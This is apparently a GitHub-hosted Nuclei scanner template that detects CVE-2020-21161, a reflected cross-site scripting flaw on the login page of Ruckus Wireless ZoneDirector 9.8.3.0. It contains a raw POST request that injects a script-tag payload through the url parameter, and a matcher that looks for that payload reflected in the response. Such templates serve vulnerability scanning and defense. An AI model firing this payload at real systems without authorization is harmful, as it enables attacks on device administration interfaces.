-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2020-21161.yml
43 lines (41 loc) · 1.62 KB
/
CVE-2020-21161.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
id: CVE-2020-21161
info:
name: Ruckus Wireless ZoneDirector XSS
author: atomiczsec
severity: medium
description: Cross Site Scripting (XSS) vulnerability in Ruckus Wireless ZoneDirector 9.8.3.0.
reference:
- https://www.tenable.com/cve/CVE-2020-21161
- https://dollahibrahim.blogspot.com/2019/11/cross-site-scripting-on-ruckus.html
tags: tags
requests:
- raw:
- |-
POST /admin/login.jsp HTTP/1.1
Host: {{Hostname}}
Cookie: -ejs-session-=xcdfed9a343544608873bbf772f5ea99d
Content-Length: 49
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
url=undefined"><script>alert("XSS")</script>&username=aaa&password=aaa&ok=Log+In
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert("XSS")</script>'